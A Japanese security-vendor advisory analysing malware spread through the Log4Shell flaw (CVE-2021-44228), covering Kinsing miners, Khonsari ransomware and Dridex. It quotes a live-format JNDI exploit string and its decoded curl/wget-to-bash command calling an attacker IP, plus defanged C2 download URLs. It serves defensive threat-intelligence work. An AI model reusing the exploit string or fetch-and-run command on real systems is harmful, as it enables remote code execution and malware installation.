Apache log4j 2 のRCE脆弱性(CVE-2021-44228)に関連したマルウェア情報を確認しています。
( 脆弱性情報(CVE-2021-44228)については、Apache log4j2 LDAP JNDI Parser RCE 脆弱性(CVE-2021-44228)情報 をご確認ください。 )
・HAFNIUM(中国): DNSサービスを悪用しlog4j脆弱性テスト試行を検知
・PHOSPHORUS(イラン): log4j脆弱性を悪用したランサムウェア配布試行を検知
・Wizard Spider(ロシア):
Contiランサムウェア配布のため、log4j脆弱性を悪用。サーバ管理ソフトウェア(Vmware vCenter Server)に
アクセス後仮想マシンを暗号化
・EvilCorp(ロシア): log4j脆弱性を悪用しDridex Infostealer配布試行
(2022年1月6日 Wizard Spider、 EvilCorp 追記)
(2021年12月30日時点、株式会社サイバーフォートレス調査)
区分 | 内容 |
---|---|
ボットネット | Muhstik(26種)、Mirai(145種)、BillGates(2種) |
仮想通貨マイニング | XMRig(XMR, 43種)、Kinsing(XMR, 27種)、m8220(XMR, 5種)、 SRBMiner(XMR他多数, 1種), XMRing(XMR, 40種) |
ランサムウェア | Khonsari(2種)、TellYouThePass(1種) |
DDoS | Elknot(3種) |
リモート制御 | Orcus(3種), Nanocore(2種) |
Infostelaer | Dridex(20種) |
CVE-2021-44228を悪用して仮想通貨マイナー(Kinsing miner)のインストール誘導攻撃を確認
※ Kinsing ・・・コンテナ環境を対象としたマルウェア(Malware)。個人情報を盗み取るだけではなく、CPUやメモリといったリソースを乗っ取り、仮想通貨のマイニングを行う。
区分 | 動作環境 |
---|---|
攻撃構文 | ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK} |
BASE64デコード | (curl -s 45.155.205[.]233[:]5874/[対象IP]:[対象port]||wget -q -O- 45.155.205[.]233[:]5874/[対象 IP]:[対象 port])|bash |
脆弱性をついた攻撃が成功すると既にインストールされている仮想通貨マイナーを確認し、削除する。
C2サーバにアクセスし、関連ファイルを「/tmp」配下へダウンロードし、実行。マイニング作業を行っていることを確認
CVE-2021-44228を悪用して、ランサムウェア感染を確認
Main.classファイルのリクエスト成功時、Kohnsariランサムウェアの実行ファイルである「groenhuyzen.exe」をダウンロードして実行
区分 | 内容 |
---|---|
脆弱性攻撃時使用されるC2 | hxxp://3.145.115[.]94/Main.class |
攻撃成功後ダウンロードを試みる ファイルパス | hxxp://3.145.115[.]94/zambo/groenhuyzen.exe |
ファイル暗号化時 .ink、.lnk 拡張子を使用するファイルを除き、特定の条件によって暗号化を実施
区分 | 内容 |
---|---|
Cドライブ | C:\Users\<ユーザーアカウント>\Documents C:\Users\<ユーザーアカウント>\Videos C:\Users\<ユーザーアカウント>\Pictures C:\Users\<ユーザーアカウント>\Downloads C:\Users\<ユーザーアカウント>\Desktop配下のファイルのみ暗号化 |
C以外のドライブ | 全体ファイル暗号化 |
ファイル暗号化の開始前にC2サーバへのtxtファイルリクエスト、0kbレスポンスを確認
ファイル暗号化が完了したファイルは拡張子が.khonsarifに変更され、暗号化完了時にランサムノートが確認可能
(2021年1月6日 追記)
区分 | 内容 |
---|---|
説明 | Chrome, Internet Explorerのようなウェブブラウザをモニタリングし銀行及び個人情報を 窃取するマルウェア |
機能 | システム情報収集、ユーザー情報収集、インターネット設定変更、レジストリキー検索で インストールされたソフトウェアリストの収集など |
Apache Log4j2の脆弱性を用いてJavaクラスファイルをリクエスト
Javaクラスファイルを確認すると、複数のC2サーバアドレスの中からランダムでひとつを引いてHTAファイルをダウンロードし、実行
HTAファイルダウンロード成功時:Windows
HTAファイルダウンロード失敗時:UNIX, LINUX として判断
- HTAファイルダウンロード失敗時
curlを使用してpythonファイルをダウンロードし実行
- HTAファイルダウンロード成功時
VBSファイルを C:\ProgramData\ 配下に作成した後に実行
VBSファイルをC2からダウンロードし、rundll32またはregsvr32を使用してDridex実行
HTAファイルの実行失敗時には、pythonファイルをダウンロードし、base64デコード結果、リバースシェル使用を目的としたMeterpreterをインストールするデータが含まれていることを確認
1) Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
2) Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild
https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild
3) Analysis of Novel Khonsari Ransomware Deployed by the Log4Shell Vulnerability
https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/
4) Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis
https://www.nozominetworks.com/blog/critical-log4shell-apache-log4j-zero-day-attack-analysis/
5) Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j2 exploitation
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
6) Log4j vulnerability now used to install Dridex banking malware
https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
(2021年1月6日追記)
Written by CYBERFORTRESS, INC.
Tweet